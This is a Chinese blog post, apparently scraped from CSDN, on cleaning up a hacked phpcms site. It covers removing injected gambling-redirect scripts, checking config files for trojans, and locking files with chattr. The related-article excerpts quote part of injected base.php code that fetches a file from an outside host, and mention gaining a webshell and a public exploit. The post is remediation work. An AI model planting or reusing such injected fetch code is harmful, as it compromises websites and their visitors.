phpcms被攻击的解决方案

最新推荐文章于 2023-02-02 17:22:13 发布
最新推荐文章于 2023-02-02 17:22:13 发布
阅读量1.1k 收藏
点赞数
分类专栏: phpcms
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_16144799/article/details/105663277
版权

1.搜索跳转到博彩网站:被挂马,需要检查所有html页面是否有

这种标签里面的内容需要全部删除,可以利用www目录下的文件

debug.js进行批量删除

debug.js运行方式通过ssh进入到www目录下以后执行node deBug.js

如果还有的话phpcms就检查/caches/configs/database.php里面是否有木马文件

,检查caches\configs是否有config.php,如果有就删除

 

2.后台验证码出不来,首先先检查是否被挂马,然后再看api/checkcode.php是否有结束?>符号

如果没有就添在最后

 

3.后台编辑器出不来,原因是编辑器的js被挂马,可以把一个新的编辑替换原来的编辑器,也可以把挂马的

代码给删除

 

4.后台登录不上去,有可能config.php被挂马,删除挂马代码即可

 

 

5.KindEditor:Ajax提交表单时获取不到HTML内容:

当Ajax提交表单时,textarea的value还是空的,需要使用sync()去同步HTML数据

 

 

6.如果网站被百度封了,先检查网站本身是否有问题,然后去解封

 

7.网址为 http://www.zzrdjt.com/index.php?m=admin 的网页可能暂时无法连接,或者它已永久性地移动到了新网址。

ERR_CONTENT_DECODING_FAILED

phpcms/base.php里面有可能多了一个红点

官网服务器

 

锁网站命令 chattr +i -R ./网站名/

 

解锁网站 chattr -i -R ./网站名/

渣渣妞
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用phpcms后台漏洞渗透某网站
chengman3837的博客
04-24 3662
本文来源于i春秋学院,未经允许严禁转载 phpcms v9版本最近爆了好几个漏洞,网上公开了不少信息,但没有真正实战过,就不能掌握其利用方法,本次是在偶然的机会下,发现一个网站推荐楼凤信息,通过分析,其采用了phpcms系统,经过测试成功获取webshell。 1.1扫描及分析端口信...
php后台无法登入,PHPcms入侵导致网站后台无法登陆的解决方法
weixin_39980917的博客
03-10 917
phpcms程序比非常内容的DeDecms来说用户方面少很多,操作方面相对来说还是DeDeCMS更容易得到用户的认可。当然什么程序都能得到用户青睐,asp主机、PHP虚拟主机、只要稳定速度快就是用户心中的好主机。本节无忧主机小编将给大家介绍一下,PHPcms入侵导致网站后台无法登陆的解决方法PHPcms入侵导致网站后台无法登陆的解决方法如下:1、首先是点击进入到我们的控制面板,然后找到文件管理选项...
php cms2008代码注入,phpcms2008远程代码执行漏洞
weixin_32722049的博客
03-19 267
描述:近日,互联网爆出PHPCMS2008代码注入漏洞(CVE-2018-19127)。攻击者利用该漏洞,可在未授权的情况下实现对网站文件的写入。该漏洞危害程度为高危(High)。目前,漏洞利用原理已公开,厂商已发布新版本修复此漏洞。影响范围:PHPCMS2008 sp4及以下版本POC github地址:漏洞分析:在type.php中:包含/include/common.inc.php 其作用是...
关于phpcms最近有被黑的情况
znh_dyt的博客
08-23 851
近日: 项目上线,陆陆续续的出现一些问题。有各种恶意添加用户的情况,虽然没有造成经济损失,但是同仁觉得很烦。我就找了一下原因,该用的方法都已近尝试了,然后我就依靠外部找了一些简单解决办法。 1.前台注册基本的安全考虑 防 sql注入,防XSS,防爆破 2.开启系统自带的短信验证 邮箱验证,这些东东与用户一一对应。 3.缩短用户名的需求,正则 ajax 验证,jq的
phpcms v9 成功安装后无法登陆后台问题与解决
xhszl的专栏
05-09 2609
phpcms v9成功安装,安装过程中也meiyo
phpcms-v9】后台编辑碎片时会自动篡改你的代码
PHP在线开发笔记
09-27 2526
在后台编辑碎片时,ck编辑器会自动删除你的html代码;将ck编辑器替换为百度编辑器之后,发现百度编辑器会自动增加html代码;不管是自动删除还是自动增加你的html代码,都会导致你的页面混乱,无奈之下,只能将编辑器干掉 原因:可能是各浏览器对js的兼容性不同所导致,在后台编辑碎片时,碎片中的内容又恰恰是通过js调用放入到编辑器中的,各浏览器对js的兼容不同,导致代码被篡改或丢失 干掉
PHPCMS V9 常见问题解决方案汇总.rar
07-09
总的来说,“PHPCMS V9 常见问题解决方案汇总”这个资料包涵盖了PHPCMS V9 使用中的各个环节,从安装配置到功能扩展,再到性能优化和安全防护,为PHPCMS的爱好者提供了一站式的解决方案。通过学习和实践,用户不仅...
PHPCMS V10 修改版
最新发布
07-12
总之,PHPCMS V10 修改版作为一个强大的建站系统,为企业和个人提供了全面的内容管理和网站构建解决方案。无论你是初次接触CMS,还是有经验的开发者,都能在这个系统中找到适合自己的工具和功能。
行业分类资讯phpcms模板
04-01
综上所述,行业分类资讯phpcms模板是一个集成了多种功能和设计考虑的网站解决方案,旨在帮助用户快速搭建起专业且易于维护的行业资讯网站。通过深入理解和灵活运用这些知识点,我们可以根据实际需求定制出符合业务...
phpcms v9的问答模块插件
02-05
phpcms V9是一款功能强大的开源内容管理系统,它为企业网站提供了一整套高效、稳定、易用的内容管理解决方案。问答模块是phpcms V9系统中的一个重要组成部分,用于搭建社区论坛或者知识问答平台,让用户能够相互提问...
PHPCMS系统安全设置步骤
09-29
- **解决方案**: 创建一个新的模板文件夹并自定义名称(例如`template/custom`),将模板文件移动到新目录下,并在网站配置中更新相应的路径。 **2. 权限控制** - **设置文件权限**: 确保模板文件及其目录的权限...
php项目被黑了 处理,记录一下网站被黑(攻击)的处理过程
weixin_30195669的博客
04-02 646
今天一个朋友发来一个网站网站攻击了。我打开网站看了下,网页在浏览器里看着一切正常。看源代码的时候,发现了问题。网站的标题、描述、关键词都被修改了。这里记录一下处理的过程。1. 查看网站的程序网站的程序是用织梦系统,因为是织梦系统的网站。首页有静态访问,和动态访问两种。这个网站是动态访问的。然后就检查了首页文件 index.php 和模板文件,发现这两块是没有问题的。平时经常遇到的是生成一个静...
后台被入侵了解决详情
weixin_67757219的博客
02-02 419
首先我们来确认下客户的服务器,使用的是linux centos系统,网站采用的PHP语言开发,数据库类型是mysql,使用开源的thinkphp架构二次开发而成,服务器配置是16核,32G内存,带宽100M独享,使用的是阿里云ECS服务器,在被黑客攻击之前,收到过阿里云的短信,提示服务器在异地登录,我们小蚁安全技术跟客户对接了阿里云的账号密码以及服务器的IP,SSH端口,root账号密码。记录一下我们整个的安全处理过程,教大家该如何防止服务器被攻击,如何解决服务器被入侵的问题。
phpcms_v9 容易中毒
weixin_45609681的博客
08-11 210
主要是模板文件的头部会加载一些js, 和caches/configs/route.php 的头部会导向病毒网站
记一次phpcms反黑过程
Neo的专栏
12-02 449
一、修复方式 如果你的phpcms攻击了,通过百度搜索进入网站的时候,跳转到“×××赌博城”之类的网站,那么可以如下处理: 1、检查phpcms/base.php中,是否被修改。如果修改了,把被加入的东西删除。 我的是被加入了如下代码: $gif="http://www.imagesspider.com/js.gif"; $str=@ file_get_contents($gif); ...
phpcms被挂马,第二波
chuangqiaoqi4023的博客
07-06 1121
上一篇,用robots.txt阻止搜索引擎收录;黑客也就只有使用最直接的手段,直接篡改首页; 接下来应对措施为: phpcms的修改 1.首页index.php禁止修改(chattr +i); 2.路由里面禁止畸形文件运行,如index.php?234dfsdf.html; $_GET不为空的...
网站攻击的常见形式
qq_40314848的博客
09-16 417
(一)网站网页被挂马:当我们打开网站网页时,会被浏览器或电脑安全管理软件提示,此网站存在风险、此网站被挂马等报告,是因为网页和根目录文件中被植入了js,当打开网页时,触发js的命令,自动执行含有木马的脚本或php文件,从而窃取用户的隐私数据。被攻击网站往往是一些涉及虚拟货币或有交易性质的网站。 (二)网站网页中出现大量的黑链:网站的网页一般用户看着没有什么异常,但是在网站的源代码中,往往是在最底部,出现了大量的锚文本链接,而这些链接往往被隐藏起来,字体大小为0或极限便宜位置。被攻击的目的在于,一些黑客非法
打开网站被挂马跳转到博彩页面 解决办法
热门推荐
网站安全专家
12-23 4万+
从百度这里点击进去,我的网站会直接跳转到赌博网站上去,我一开始以为 是百度有问题了,我再从其他搜索引擎试了一下,360搜索,搜狗搜索点击进去, 都会自动跳转到赌博网站上去,难不成是我网站出问题了? 我自己做的网站都有三四年的时间了,用的开源phpcms开发的程序,自己二次开发 过,但一直都用的好好的就是最近网站被客户投诉说是跳转到博彩网站上去,我才 ...
php报错“ERR_CONTENT_DECODING_FAILED”的通用解决办法
sinat_29193161的博客
12-08 1249
先看字面意思:内容解码失败 1、在哪里给内容加码了? 可能页面有echo 部分数据 2、* nginx、php、框架* 3、 检查 nginx 配置, gzip 开启状态。关闭 gzip 并重启,无效。排除 4、检查 php 配置, zlib.output_compression ,发现是关闭的。开启配置并重启,页面正常。 5、 检查框架,发现框架内在 output_compression 关闭的时候,会使用 ob_gzhandler 函数,找到原因 6、之所以使用 ob_gzhandle.
PHPcmsv9常见问题解决方案
phpcmsv9中,使用IE7浏览器时可能会出现无法实现前台登录的问题,解决方案是: 1. 修改文件根目录\phpcms\modules\member\index.php第17行, оригинальный代码是 `$this->...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值